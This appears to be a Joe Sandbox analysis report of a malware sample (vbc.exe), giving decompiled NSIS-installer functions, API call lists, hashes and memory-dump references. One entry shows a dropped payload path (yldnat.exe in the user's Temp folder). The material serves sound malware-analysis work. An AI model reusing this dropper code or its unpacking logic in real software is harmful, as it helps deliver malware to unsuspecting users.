                                                        0x00403046
                                                        0x00403049
                                                        0x00403049
                                                        0x0040304f
                                                        0x00000000
                                                        0x0040304f
                                                        0x0040305d
                                                        0x00000000
                                                        0x00403060
                                                        0x00403067
                                                        0x00403073
                                                        0x0040307b
                                                        0x004030b9
                                                        0x004030c2
                                                        0x00000000
                                                        0x004030c7
                                                        0x00403084
                                                        0x00403095
                                                        0x00000000
                                                        0x004030a3
                                                        0x00403084
                                                        0x004030cf

                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00403049
                                                        • GetTickCount.KERNEL32(00000000), ref: 00403067
                                                        • wsprintfW.USER32 ref: 00403095
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                        • CreateDialogParamW.USER32 ref: 004030B9
                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                          • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                                        • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                                                        • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                                        • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                        0x00404f93
                                                        0x00404fa0
                                                        0x00404fa6
                                                        0x00404fe4
                                                        0x00404fe4
                                                        0x00404ff3
                                                        0x00404ffa
                                                        0x00000000
                                                        0x00404ffc
                                                        0x00404fa8
                                                        0x00404fb7
                                                        0x00404fbf
                                                        0x00404fc2
                                                        0x00404fd4
                                                        0x00404fda
                                                        0x00404fe1
                                                        0x00000000
                                                        0x00404fe1
                                                        0x00000000

                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                                                        • GetMessagePos.USER32 ref: 00404FA8
                                                        • ScreenToClient.USER32(?,?), ref: 00404FC2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                        • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                        • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                        0x00402fa3
                                                        0x00402fb1
                                                        0x00402fb7
                                                        0x00402fb7
                                                        0x00402fc5
                                                        0x00402fc7
                                                        0x00402fd3
                                                        0x00402fd8
                                                        0x00402fda
                                                        0x00402fda
                                                        0x00402fe5
                                                        0x00402ff5
                                                        0x00403007
                                                        0x00403007
                                                        0x0040300f

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                        • wsprintfW.USER32 ref: 00402FE5
                                                        • SetWindowTextW.USER32 ref: 00402FF5
                                                        • SetDlgItemTextW.USER32 ref: 00403007
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                                        • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                                                        • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                                        • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                        0x00402950
                                                        0x00402952
                                                        0x00402957
                                                        0x0040295c
                                                        0x0040295f
                                                        0x00402969
                                                        0x0040296d
                                                        0x0040296d
                                                        0x00402973
                                                        0x00402980
                                                        0x00402988
                                                        0x0040298b
                                                        0x00402997
                                                        0x0040299a
                                                        0x004029a0
                                                        0x004029ae
                                                        0x004029b3
                                                        0x004029b7
                                                        0x004029ba
                                                        0x004029c3
                                                        0x004029cf
                                                        0x004029d3
                                                        0x004029d6
                                                        0x004029e0
                                                        0x004029ff
                                                        0x004029e7
                                                        0x004029ec
                                                        0x004029f4
                                                        0x004029f7
                                                        0x004029fc
                                                        0x004029fc
                                                        0x00402a06
                                                        0x00402a06
                                                        0x00402a13
                                                        0x00402a19
                                                        0x00402a1f
                                                        0x00402a1f
                                                        0x004029b7
                                                        0x00402a33
                                                        0x00402a35
                                                        0x00402a35
                                                        0x00402a3f
                                                        0x00402a40
                                                        0x00402a44
                                                        0x00402a48
                                                        0x00402a4e
                                                        0x00402a4e
                                                        0x00402a55
                                                        0x004022f1
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                        • GlobalFree.KERNEL32(?), ref: 00402A06
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                        • CloseHandle.KERNEL32(?), ref: 00402A35
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                                        • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                                                        • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                                        • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                        0x00402eb4
                                                        0x00402ebd
                                                        0x00402ec6
                                                        0x00402ed2
                                                        0x00402edb
                                                        0x00402ee5
                                                        0x00402f0a
                                                        0x00402f10
                                                        0x00402f15
                                                        0x00402f16
                                                        0x00402f46
                                                        0x00402f1f
                                                        0x00402f21
                                                        0x00402f71
                                                        0x00402f74
                                                        0x00000000
                                                        0x00402f7a
                                                        0x00402f30
                                                        0x00402f35
                                                        0x00402f37
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f3f
                                                        0x00402f44
                                                        0x00402f45
                                                        0x00402f45
                                                        0x00402f52
                                                        0x00402f5a
                                                        0x00402f61
                                                        0x00000000
                                                        0x00402f8a
                                                        0x00000000
                                                        0x00402f69
                                                        0x00402ef5
                                                        0x00402f08
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f08
                                                        0x00402f90

                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                        • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                                                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                        • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                        0x00401d81
                                                        0x00401d85
                                                        0x00401d9a
                                                        0x00401d87
                                                        0x00401d89
                                                        0x00401d8f
                                                        0x00401d8f
                                                        0x00401da0
                                                        0x00401da3
                                                        0x00401dad
                                                        0x00401db0
                                                        0x00401db8
                                                        0x00401dc9
                                                        0x00401dcc
                                                        0x00401dd7
                                                        0x00401dce
                                                        0x00401dd0
                                                        0x00401dd0
                                                        0x00401ddb
                                                        0x00401de5
                                                        0x00401e0c
                                                        0x00401e1b
                                                        0x00401e29
                                                        0x00401e31
                                                        0x00401e39
                                                        0x00401e39
                                                        0x00401e42
                                                        0x00401e48
                                                        0x00402ba4
                                                        0x00402ba4
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                        • GetClientRect.USER32 ref: 00401DE5
                                                        • LoadImageW.USER32 ref: 00401E15
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                                        • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                                                        • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                                                        • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                        0x00401e4e
                                                        0x00401e59
                                                        0x00401e5b
                                                        0x00401e68
                                                        0x00401e7f
                                                        0x00401e84
                                                        0x00401e91
                                                        0x00401e96
                                                        0x00401e9a
                                                        0x00401ea5
                                                        0x00401eac
                                                        0x00401ebe
                                                        0x00401ec4
                                                        0x00401ec9
                                                        0x00401ed3
                                                        0x00402638
                                                        0x0040156d
                                                        0x00402ba4
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E51
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                        • MulDiv.KERNEL32 ref: 00401E73
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                          • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
